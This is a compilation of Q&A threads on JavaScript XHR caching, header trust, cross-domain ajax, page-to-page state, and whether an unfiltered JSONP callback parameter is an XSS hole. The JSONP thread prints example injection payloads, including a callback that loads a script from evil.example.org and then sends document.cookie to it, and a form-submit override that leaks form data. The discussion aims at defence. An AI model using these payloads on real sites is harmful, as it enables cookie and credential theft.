I've noticed that Firefox does not cache GET requests automatically. Following the code I use:
var ajax = new XMLHttpRequest();
ajax.open("GET","page.php?val=" + val,true);
ajax.send();
With jquery is possible to give cache: true;, how can I save in the cache with Vanilla Javascript (client side)? Is also possible to decide for how long? Can you give me an example of code? Thank you in advance!
Web caching is largely controlled by the headers sent from the Server (Expires:, etc.). Browsers sometimes "cheat" and don't really cache even though the headers would allow them to ...probably because the user had used their UI to turn off caching, for example by setting the cache size to zero. But browsers that "cheat" the other direction, caching anyway even though the headers don't allow it, are (for good reason) extremely uncommon.
If caching is not happening for you, it's a function of the file and the server (or perhaps the browser configuration), not of any browser type or version. (To say the same thing a different way, your Firefox would cache just fine if the Server sent the needed headers.) The headers are controlled a variety of ways by different servers and different providers. For the Apache server, the nitty-gritty may be in a ".htaccess" file, pre-written templates of which are often available.
To a first approximation, with HTML4, you simply cannot control web caching from the client side, no matter what tool you use and no matter what your program does. A generic exception is provided by the new "online application cache" or "appcache" in HTML5 ...but with other restrictions, for example those about "one per site" and "same origin".
You can cache responses using a simple hash, something like:
var cache = {};
function getData(variable) {
if (cache[variable]) {
return cache[variable];
}
// previous ajax code to get the data...
// in the response handler, do:
cache[variable] = data;
}
That's a naive implementation of a caching mechanism: only works for the lifetime of the page (i.e., until the page is refreshed or navigated away from), doesn't have any expiration mechanism, and other shortcomings I'm sure. For instance, you could use localStorage to get around the refresh issue.
But hey, I'm not getting paid to write this :).
Related
I am using Requestly Chrome extension to intercept and modify HTTP request headers and change their original values inside my NodeJS app.
How can I prevent attack? For example, I can change Referer header and inject link.
There is no way to prevent users from doing this.
You can't trust the Referer header.
You cannot, but you can try to make the thing more difficult to do, thing a tricky way to sign the headers / datas (sha512, etc..) and add signature in the headers/cookie/datas.
Use the same function on your server to check if the value has been modified during the transport.
"But the 'hacker' can still try to inspect the client code and use the signature function to modify the values ?"
Yes, but you can transform the thing in something completely illisible:
Make your app include a bench of useless big script which doing nothing (uglified of course)
Divide your signature function in many (many) functions named with random char and then uglified them, put one of them inside your useless big scripts.
...
Nothing is trustable on client side, but you can try to discourage the hackers :D
I am doing a jquery.ajax() call on one of our pages to fetch a small text file. I see some of the requests (not all) fail with resp.statusText: "No Transport" and resp.status : 0
What does the error mean (No Transport with a resp code of 0). Strangely it works on some browsers, and doesn't work on some. I couldn't find a patter by looking at the user agents of browsers, where it failed.
Any help would be highly appreciated. I am a beginner to javascript and jquery library, let me know if I omitted crucial information.
My use case:
abc.mydomain.com contains jquery.ajax(url:xyz.mydomain.com) call
Most likely it prevents you from firing a request because it things you are trying to access another domain. xyz.mydomain.com !== mydomain.com.
Why that is not allowed?
Read
Use a Web Proxy for Cross-Domain XMLHttpRequest Calls
Why the cross-domain Ajax is a security concern?
An example to why this is a security issue, assume you installed a bad plugin to your browser. If that plugin got the permission, it can read all loaded files to your browser and be able to edit/change/inject content and codes. Then it might send all collected data to designer own server.
... The most common business needs that are easily accomplished with browser plug-ins are: modify default search, add side frames, inject new content into existing webpage ...more
A good practice is to fetch the data thru ajax via JSON, if you are trying to access another site beside the one the script is calling from, then use JSON-P.
Read
JSON-P
JSON-P call to subdomain
Chrome ajax call to subdomain
A common architecture is to call the current domain that the script is loaded from, then use server script to fetch data from the other domain where the other domain will response to the request and return the data.
A code snippets of your function will help us understand your issue more.
I'm looking to make one XmlHttpRequest (every 30 minutes -- retrieving weather forecast) and use the XML response over multiple html documents. I've looked near and far and can only get the parsed XML to show on one document.
Is there a way to reference different documents from one javascript function?
No framework, just straight javascript/ajax.
forecastXMLreq = new XMLHttpRequest();
forecastXMLreq.open("GET",forecastURL,false);
forecastXMLreq.send();
forecastXML = forecastXMLreq.responseXML;
var day1 = forecastXML.getElementsByTagName("weekday_short")[1].childNodes[0].nodeValue;
document.getElementById("day1").innerHTML = day1.toUpperCase();
Multiple html files, one XHR call is what I'm looking for
The easiest way would be to leverage regular http caching. On the next pages, you still need to request the file in your code, but the browser can potentially skip the request and just automatically and transparently fetch from the local disk cache instead. You aren't guaranteed it will be cached for the full 30 minutes, as the browser has a limited amount of cache space and it decides what to purge, and when.
Just configure the server to send the following http header for that xml response
Cache-Control: max-age=1800
more info on http caching
http://www.mnot.net/cache_docs/
An alternative is to make use of the limited support that browser offer for html5 local storage. No web server config is needed, although browser support is limited, and you don't need to re request the file in the code, but then again you will have different code for retrieving it from local storage.
Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability. Wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously for a URL that returns the content type of text/html, this poses a problem wherein the browser renders that HTML and then executes the potentially malicious javascript in the onload handler. Could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing. User checks the domain and sees that it's one he trusts, so he goes agead and logs in.
But, in our case, we're setting the content type header to application/javascript which causes various different behaviors in different browsers. i.e. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those to be particularly exploitable. The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it. And the IE user is probably going to be confused by the save as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)
Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.
Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However any good JSON encoder would fix that by quoting the double-quote characters.
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.
Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It is stubborn, and goes to look at the first few bytes of the HTTP response directly, and if it looks kinda of HTML, it will proceed to parse and execute it all as text/html, including inline scripts.
There's nothing to stop them from doing something that inserts code, if that is the case.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except http://example.com/jsonp, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.
As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or eval()s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?
Let's say I have a page that refers to a .js file. In that file I have the following code that sets the value of a variable:
var foo;
function bar()
{
foo = //some value generated by some type of user input
}
bar();
Now I'd like to be able to navigate to another page that refers to the same script, and have this variable retain the value set by bar(). What's the best way to transport the value of this variable, assuming the script will be running anew once I arrive on the next page?
You can use cookies.
Cookies were originally invented by
Netscape to give 'memory' to web
servers and browsers. The HTTP
protocol, which arranges for the
transfer of web pages to your browser
and browser requests for pages to
servers, is state-less, which means
that once the server has sent a page
to a browser requesting it, it doesn't
remember a thing about it. So if you
come to the same web page a second,
third, hundredth or millionth time,
the server once again considers it the
very first time you ever came there.
This can be annoying in a number of
ways. The server cannot remember if
you identified yourself when you want
to access protected pages, it cannot
remember your user preferences, it
cannot remember anything. As soon as
personalization was invented, this
became a major problem.
Cookies were invented to solve this
problem. There are other ways to solve
it, but cookies are easy to maintain
and very versatile.
See: http://www.quirksmode.org/js/cookies.html
You can pass the value in the query string.
When the user navigate to the other page append the value to the query string and load it in the next.
Another option is jStorage. jStorage is probably better used for cached data and lossy user preferences (e.g. saved username in a login form), as it doesn't have full browser support (but IE6+ and most other common browsers support it) and cannot be relied upon (like cookies).
You can use YUI's Cookie Library http://developer.yahoo.com/yui/cookie/